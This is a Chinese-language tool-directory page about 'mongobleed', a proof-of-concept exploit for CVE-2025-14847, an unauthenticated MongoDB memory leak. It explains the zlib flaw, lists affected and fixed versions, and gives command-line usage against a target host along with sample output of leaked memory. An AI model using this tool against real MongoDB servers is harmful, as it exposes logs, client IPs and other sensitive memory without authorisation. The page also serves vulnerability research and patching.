Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mongobleed | Kitploit
工具/GitHubGitHub/joe-desimone/mongobleed
内存取证漏洞分析漏洞利用信息收集渗透测试数据库安全
GitHubjoe-desimone/mongobleed

mongobleed

查看仓库
9431687个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mongobleed

CVE-2025-14847 - MongoDB 未授权内存泄漏漏洞利用程序

这是针对 MongoDB zlib 解压漏洞的概念验证(PoC)利用程序,允许未授权攻击者泄漏服务器敏感内存。

漏洞

MongoDB 的 zlib 消息解压存在缺陷,返回的是分配的缓冲区大小,而非实际解压后的数据长度。攻击者可借此读取未初始化内存,方法如下:

  1. 发送带有虚增 uncompressedSize 声明的压缩消息
  2. MongoDB 根据攻击者的声明分配大型缓冲区
  3. zlib 将实际数据解压到缓冲区起始位置
  4. 该缺陷导致 MongoDB 将整个缓冲区视为有效数据
  5. BSON 解析会从未初始化内存中读取“字段名”,直到遇到空字节

受影响版本

版本受影响版本修复版本
8.2.x8.2.0 - 8.2.28.2.3
8.0.x8.0.0 - 8.0.168.0.17
7.0.x7.0.0 - 7.0.277.0.28
6.0.x6.0.0 - 6.0.266.0.27
5.0.x5.0.0 - 5.0.315.0.32

使用方法

root@kitploit:~
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>

# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000

# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000

选项

示例输出

root@kitploit:~
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Author: Joe Desimone - x.com/dez_
[*] Target: localhost:27017
[*] Scanning offsets 20-50000

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: Recv SyncookiesFailed EmbryonicRsts ...

[*] Total leaked: 8748 bytes
[*] Unique fragments: 42
[*] Saved to: leaked.bin

测试环境

随附一个 Docker Compose 文件,用于快速启动一个存在漏洞的 MongoDB 实例:

root@kitploit:~
docker-compose up -d
python3 mongobleed.py

工作原理

该利用程序会构造带有虚增长度字段的 BSON 文档。当服务器解析这些文档时,会从未初始化内存中读取字段名,直到遇到空字节。在不同偏移处进行探测,可泄漏不同的内存区域。

泄漏的数据可能包括:

  • MongoDB 内部日志和状态
  • WiredTiger 存储引擎配置
  • 系统 /proc 数据(meminfo、网络统计信息)
  • Docker 容器路径
  • 连接 UUID 和客户端 IP

参考

  • OX Security 安全公告
  • MongoDB 修复提交

作者

Joe Desimone - x.com/dez_

免责声明

此工具仅供经授权的安全测试使用。未经授权访问计算机系统属于违法行为。

下载工具
参数默认值说明
--hostlocalhost目标 MongoDB 主机
--port27017目标 MongoDB 端口
--min-offset20要探测的最小文档长度
--max-offset8192要探测的最大文档长度
--outputleaked.bin泄漏数据的输出文件